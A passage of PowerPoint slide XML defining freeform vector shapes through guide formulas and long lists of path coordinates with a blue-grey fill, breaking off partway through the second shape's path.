                  <a:gd name="T57" fmla="*/ 37 h 71"/>
                  <a:gd name="T58" fmla="*/ 84 w 93"/>
                  <a:gd name="T59" fmla="*/ 39 h 71"/>
                  <a:gd name="T60" fmla="*/ 78 w 93"/>
                  <a:gd name="T61" fmla="*/ 41 h 71"/>
                  <a:gd name="T62" fmla="*/ 76 w 93"/>
                  <a:gd name="T63" fmla="*/ 46 h 71"/>
                  <a:gd name="T64" fmla="*/ 76 w 93"/>
                  <a:gd name="T65" fmla="*/ 52 h 71"/>
                  <a:gd name="T66" fmla="*/ 74 w 93"/>
                  <a:gd name="T67" fmla="*/ 57 h 71"/>
                  <a:gd name="T68" fmla="*/ 76 w 93"/>
                  <a:gd name="T69" fmla="*/ 59 h 71"/>
                  <a:gd name="T70" fmla="*/ 74 w 93"/>
                  <a:gd name="T71" fmla="*/ 64 h 71"/>
                  <a:gd name="T72" fmla="*/ 72 w 93"/>
                  <a:gd name="T73" fmla="*/ 60 h 71"/>
                  <a:gd name="T74" fmla="*/ 70 w 93"/>
                  <a:gd name="T75" fmla="*/ 61 h 71"/>
                  <a:gd name="T76" fmla="*/ 65 w 93"/>
                  <a:gd name="T77" fmla="*/ 64 h 71"/>
                  <a:gd name="T78" fmla="*/ 61 w 93"/>
                  <a:gd name="T79" fmla="*/ 65 h 71"/>
                  <a:gd name="T80" fmla="*/ 60 w 93"/>
                  <a:gd name="T81" fmla="*/ 69 h 71"/>
                  <a:gd name="T82" fmla="*/ 55 w 93"/>
                  <a:gd name="T83" fmla="*/ 71 h 71"/>
                  <a:gd name="T84" fmla="*/ 51 w 93"/>
                  <a:gd name="T85" fmla="*/ 69 h 71"/>
                  <a:gd name="T86" fmla="*/ 45 w 93"/>
                  <a:gd name="T87" fmla="*/ 70 h 71"/>
                  <a:gd name="T88" fmla="*/ 42 w 93"/>
                  <a:gd name="T89" fmla="*/ 70 h 71"/>
                  <a:gd name="T90" fmla="*/ 40 w 93"/>
                  <a:gd name="T91" fmla="*/ 65 h 71"/>
                  <a:gd name="T92" fmla="*/ 33 w 93"/>
                  <a:gd name="T93" fmla="*/ 56 h 71"/>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93"/>
                  <a:gd name="T142" fmla="*/ 0 h 71"/>
                  <a:gd name="T143" fmla="*/ 93 w 93"/>
                  <a:gd name="T144" fmla="*/ 71 h 71"/>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93" h="71">
                    <a:moveTo>
                      <a:pt x="28" y="56"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="28" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="54" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="55" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="61" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="62" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="64" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="66" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="68" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="72" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="75" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="77" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="81" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="83" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="84" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="85" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="87" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="90" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="90" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="89" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="89" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="88" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="88" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="90" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="92" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="93" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="92" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="91" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="90" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="90" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="89" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="88" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="87" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="86" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="85" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="84" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="83" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="81" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="78" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="77" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="76" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="76" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="76" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="76" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="76" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="74" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="74" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="74" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="73" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="74" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="76" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="77" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="76" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="74" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="73" y="63"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="73" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="72" y="60"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="72" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="71" y="60"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="70" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="68" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="67" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="64" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="63"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="61" y="65"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="62" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="61" y="68"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="59" y="68"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="55" y="71"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="71"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="70"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="45" y="70"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="70"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="70"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="68"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="65"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="56"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="96AFCF"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36095" name="Freeform 228"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3071" y="1856"/>
                <a:ext cx="93" cy="71"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 28 w 93"/>
                  <a:gd name="T1" fmla="*/ 54 h 71"/>
                  <a:gd name="T2" fmla="*/ 29 w 93"/>
                  <a:gd name="T3" fmla="*/ 47 h 71"/>
                  <a:gd name="T4" fmla="*/ 30 w 93"/>
                  <a:gd name="T5" fmla="*/ 43 h 71"/>
                  <a:gd name="T6" fmla="*/ 27 w 93"/>
                  <a:gd name="T7" fmla="*/ 40 h 71"/>
                  <a:gd name="T8" fmla="*/ 23 w 93"/>
                  <a:gd name="T9" fmla="*/ 39 h 71"/>
                  <a:gd name="T10" fmla="*/ 17 w 93"/>
                  <a:gd name="T11" fmla="*/ 38 h 71"/>
                  <a:gd name="T12" fmla="*/ 10 w 93"/>
                  <a:gd name="T13" fmla="*/ 35 h 71"/>
                  <a:gd name="T14" fmla="*/ 7 w 93"/>
                  <a:gd name="T15" fmla="*/ 32 h 71"/>
                  <a:gd name="T16" fmla="*/ 4 w 93"/>
                  <a:gd name="T17" fmla="*/ 33 h 71"/>
                  <a:gd name="T18" fmla="*/ 1 w 93"/>
                  <a:gd name="T19" fmla="*/ 22 h 71"/>
                  <a:gd name="T20" fmla="*/ 0 w 93"/>
                  <a:gd name="T21" fmla="*/ 10 h 71"/>
                  <a:gd name="T22" fmla="*/ 7 w 93"/>
                  <a:gd name="T23" fmla="*/ 6 h 71"/>
                  <a:gd name="T24" fmla="*/ 19 w 93"/>
                  <a:gd name="T25" fmla="*/ 0 h 71"/>
                  <a:gd name="T26" fmla="*/ 29 w 93"/>
                  <a:gd name="T27" fmla="*/ 1 h 71"/>
                  <a:gd name="T28" fmla="*/ 33 w 93"/>
                  <a:gd name="T29" fmla="*/ 2 h 71"/>
                  <a:gd name="T30" fmla="*/ 37 w 93"/>
                  <a:gd name="T31" fmla="*/ 2 h 71"/>
                  <a:gd name="T32" fmla="*/ 43 w 93"/>
                  <a:gd name="T33" fmla="*/ 2 h 71"/>
                  <a:gd name="T34" fmla="*/ 52 w 93"/>
                  <a:gd name="T35" fmla="*/ 5 h 71"/>
                  <a:gd name="T36" fmla="*/ 58 w 93"/>
                  <a:gd name="T37" fmla="*/ 4 h 71"/>
                  <a:gd name="T38" fmla="*/ 63 w 93"/>
                  <a:gd name="T39" fmla="*/ 0 h 71"/>
                  <a:gd name="T40" fmla="*/ 68 w 93"/>
                  <a:gd name="T41" fmla="*/ 8 h 71"/>
                  <a:gd name="T42" fmla="*/ 77 w 93"/>
                  <a:gd name="T43" fmla="*/ 12 h 71"/>
                  <a:gd name="T44" fmla="*/ 84 w 93"/>
                  <a:gd name="T45" fmla="*/ 18 h 71"/>
                  <a:gd name="T46" fmla="*/ 90 w 93"/>
                  <a:gd name="T47" fmla="*/ 22 h 71"/>
                  <a:gd name="T48" fmla="*/ 89 w 93"/>
                  <a:gd name="T49" fmla="*/ 27 h 71"/>
                  <a:gd name="T50" fmla="*/ 90 w 93"/>
                  <a:gd name="T51" fmla="*/ 31 h 71"/>
                  <a:gd name="T52" fmla="*/ 92 w 93"/>
                  <a:gd name="T53" fmla="*/ 33 h 71"/>
                  <a:gd name="T54" fmla="*/ 90 w 93"/>
                  <a:gd name="T55" fmla="*/ 37 h 71"/>
                  <a:gd name="T56" fmla="*/ 87 w 93"/>
                  <a:gd name="T57" fmla="*/ 37 h 71"/>
                  <a:gd name="T58" fmla="*/ 84 w 93"/>
                  <a:gd name="T59" fmla="*/ 39 h 71"/>
                  <a:gd name="T60" fmla="*/ 78 w 93"/>
                  <a:gd name="T61" fmla="*/ 41 h 71"/>
                  <a:gd name="T62" fmla="*/ 76 w 93"/>
                  <a:gd name="T63" fmla="*/ 46 h 71"/>
                  <a:gd name="T64" fmla="*/ 76 w 93"/>
                  <a:gd name="T65" fmla="*/ 52 h 71"/>
                  <a:gd name="T66" fmla="*/ 74 w 93"/>
                  <a:gd name="T67" fmla="*/ 57 h 71"/>
                  <a:gd name="T68" fmla="*/ 76 w 93"/>
                  <a:gd name="T69" fmla="*/ 59 h 71"/>
                  <a:gd name="T70" fmla="*/ 74 w 93"/>
                  <a:gd name="T71" fmla="*/ 64 h 71"/>
                  <a:gd name="T72" fmla="*/ 72 w 93"/>
                  <a:gd name="T73" fmla="*/ 60 h 71"/>
                  <a:gd name="T74" fmla="*/ 70 w 93"/>
                  <a:gd name="T75" fmla="*/ 61 h 71"/>
                  <a:gd name="T76" fmla="*/ 65 w 93"/>
                  <a:gd name="T77" fmla="*/ 64 h 71"/>
                  <a:gd name="T78" fmla="*/ 61 w 93"/>
                  <a:gd name="T79" fmla="*/ 65 h 71"/>
                  <a:gd name="T80" fmla="*/ 60 w 93"/>
                  <a:gd name="T81" fmla="*/ 69 h 71"/>
                  <a:gd name="T82" fmla="*/ 55 w 93"/>
                  <a:gd name="T83" fmla="*/ 71 h 71"/>
                  <a:gd name="T84" fmla="*/ 51 w 93"/>
                  <a:gd name="T85" fmla="*/ 69 h 71"/>
                  <a:gd name="T86" fmla="*/ 45 w 93"/>
                  <a:gd name="T87" fmla="*/ 70 h 71"/>
                  <a:gd name="T88" fmla="*/ 42 w 93"/>
                  <a:gd name="T89" fmla="*/ 70 h 71"/>
                  <a:gd name="T90" fmla="*/ 40 w 93"/>
                  <a:gd name="T91" fmla="*/ 65 h 71"/>
                  <a:gd name="T92" fmla="*/ 33 w 93"/>
                  <a:gd name="T93" fmla="*/ 56 h 71"/>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93"/>
                  <a:gd name="T142" fmla="*/ 0 h 71"/>
                  <a:gd name="T143" fmla="*/ 93 w 93"/>
                  <a:gd name="T144" fmla="*/ 71 h 71"/>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93" h="71">
                    <a:moveTo>
                      <a:pt x="28" y="56"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="28" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="54" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="55" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="61" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="62" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="64" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="66" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="68" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="72" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="75" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="77" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="81" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="83" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="84" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="85" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="87" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="90" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="90" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="89" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="89" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="88" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="88" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="90" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="92" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="93" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="92" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="91" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="90" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="90" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="89" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="88" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="87" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="86" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="85" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="84" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="83" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="81" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="78" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="77" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="76" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="76" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="76" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="76" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="76" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="74" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="74" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="74" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="73" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="74" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="76" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="77" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="76" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="74" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="73" y="63"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="73" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="72" y="60"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="72" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="71" y="60"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="70" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="68" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="67" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="64" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="63"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="61" y="65"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="62" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="61" y="68"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="59" y="68"/>
                    </a:lnTo>
